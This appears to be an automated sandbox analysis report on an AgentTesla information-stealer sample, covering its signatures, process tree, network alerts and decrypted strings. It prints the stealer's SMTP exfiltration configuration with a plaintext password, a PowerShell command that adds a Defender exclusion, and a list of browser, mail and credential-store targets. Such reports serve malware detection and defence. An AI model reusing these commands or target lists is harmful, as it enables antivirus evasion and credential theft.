Windows Analysis Report
order2024-10-07_174915.exe

Overview

General Information

Sample name: order2024-10-07_174915.exe
Analysis ID: 1528372
MD5: 4351cdd212b361f999d8bfad8fceceee
SHA1: 34dc372ecb6165c1016b502c93657db789d31203
SHA256: 963574e90ebf7786aaf6a17966441068baeadbce658ddd2f19af9a9f3f34c7cc
Tags: agenttesla, exe, user-malwarelabnet

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • order2024-10-07_174915.exe (PID: 1448 cmdline: "C:\Users\user\Desktop\order2024-10-07_174915.exe" MD5: 4351CDD212B361F999D8BFAD8FCECEEE)
    • powershell.exe (PID: 7076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7416 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • order2024-10-07_174915.exe (PID: 7068 cmdline: "C:\Users\user\Desktop\order2024-10-07_174915.exe" MD5: 4351CDD212B361F999D8BFAD8FCECEEE)
    • order2024-10-07_174915.exe (PID: 4472 cmdline: "C:\Users\user\Desktop\order2024-10-07_174915.exe" MD5: 4351CDD212B361F999D8BFAD8FCECEEE)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}
Source | Rule | Description | Author | Strings
00000000.00000002.1282489119.000000000450D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000008.00000002.2501932436.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000008.00000002.2504284574.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.1282489119.00000000042E9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000008.00000002.2504284574.0000000002E21000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Source | Rule | Description | Author | Strings
0.2.order2024-10-07_174915.exe.450d9e0.3.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
8.2.order2024-10-07_174915.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
0.2.order2024-10-07_174915.exe.4536a00.1.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
0.2.order2024-10-07_174915.exe.450d9e0.3.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |

                      System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\order2024-10-07_174915.exe", ParentImage: C:\Users\user\Desktop\order2024-10-07_174915.exe, ParentProcessId: 1448, ParentProcessName: order2024-10-07_174915.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", ProcessId: 7076, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\order2024-10-07_174915.exe", ParentImage: C:\Users\user\Desktop\order2024-10-07_174915.exe, ParentProcessId: 1448, ParentProcessName: order2024-10-07_174915.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", ProcessId: 7076, ProcessName: powershell.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\order2024-10-07_174915.exe, Initiated: true, ProcessId: 4472, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49704
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\order2024-10-07_174915.exe", ParentImage: C:\Users\user\Desktop\order2024-10-07_174915.exe, ParentProcessId: 1448, ParentProcessName: order2024-10-07_174915.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe", ProcessId: 7076, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T21:19:52.382003+0200 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.7 | 49704 | 199.79.62.115 | 587 | TCP
2024-10-07T21:19:52.382003+0200 | 2839723 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49704 | 199.79.62.115 | 587 | TCP


                      AV Detection

                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
                      Source: order2024-10-07_174915.exeReversingLabs: Detection: 52%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: order2024-10-07_174915.exeJoe Sandbox ML: detected
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: /log.tmp
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>[
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ]<br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Time:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>User Name:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>Computer Name:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>OSFullName:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>CPU:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>RAM:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IP Address:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <hr>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: New
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IP Address:
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: mail.mbarieservicesltd.com
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: saless@mbarieservicesltd.com
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: *o9H+18Q4%;M
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: iinfo@mbarieservicesltd.com
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: false
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: appdata
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: KTvkzEc
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: KTvkzEc.exe
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: KTvkzEc
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Type
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <hr>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <b>[
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ]</b> (
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: )<br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {BACK}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {ALT+TAB}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {ALT+F4}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {TAB}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {ESC}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {Win}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {CAPSLOCK}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {KEYUP}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {KEYDOWN}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {KEYLEFT}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {KEYRIGHT}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {DEL}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {END}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {HOME}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {Insert}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {NumLock}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {PageDown}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {PageUp}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {ENTER}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F1}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F2}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F3}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F4}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F5}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F6}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F7}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F8}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F9}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F10}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F11}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {F12}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: control
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {CTRL}
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: &amp;
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: &lt;
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: &gt;
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: &quot;
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <br><hr>Copied Text: <br>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <hr>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: logins
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IE/Edge
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Secure Note
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Web Password Credential
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Credential Picker Protector
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Web Credentials
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Credentials
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Domain Certificate Credential
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Domain Password Credential
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Windows Extended Credential
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SchemaId
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pResourceElement
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pIdentityElement
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pPackageSid
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: pAuthenticatorElement
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IE/Edge
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: UC Browser
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: UCBrowser\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Login Data
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: journal
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: wow_logins
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Safari for Windows
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <array>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <dict>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <string>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </string>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <string>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </string>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: <data>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: </data>
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: -convert xml1 -s -o "
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \fixed_keychain.xml"
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Microsoft\Protect\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: credential
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: QQ Browser
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Tencent\QQBrowser\User Data
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Default\EncryptedStorage
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Profile
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \EncryptedStorage
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: entries
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: category
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Password
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: str3
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: str2
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: blob0
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: password_value
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: IncrediMail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PopPassword
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SmtpPassword
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\IncrediMail\Identities\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Accounts_New
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: PopPassword
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SmtpPassword
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SmtpServer
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: EmailAddress
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Eudora
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: current
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Settings
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: SavePasswordText
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Settings
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ReturnAddress
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Falkon Browser
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \falkon\profiles\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: profiles.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: profiles.ini
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \browsedata.db
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: autofill
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ClawsMail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Claws-mail
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \clawsrc
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \clawsrc
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: passkey0
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: master_passphrase_salt=(.+)
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \accountrc
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: smtp_server
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: address
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: account
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \passwordstorerc
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: {(.*),(.*)}(.*)
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Flock Browser
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: \Flock\Browser\
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: signons3.txt
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: DynDns
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ALLUSERSPROFILE
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Dyn\Updater\config.dyndns
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: username=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: password=
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: https://account.dyn.com/
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: t6KzXhCh
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: ALLUSERSPROFILE
                      Source: 0.2.order2024-10-07_174915.exe.4536a00.1.raw.unpackString decryptor: Dyn\Updater\daemon.cfg
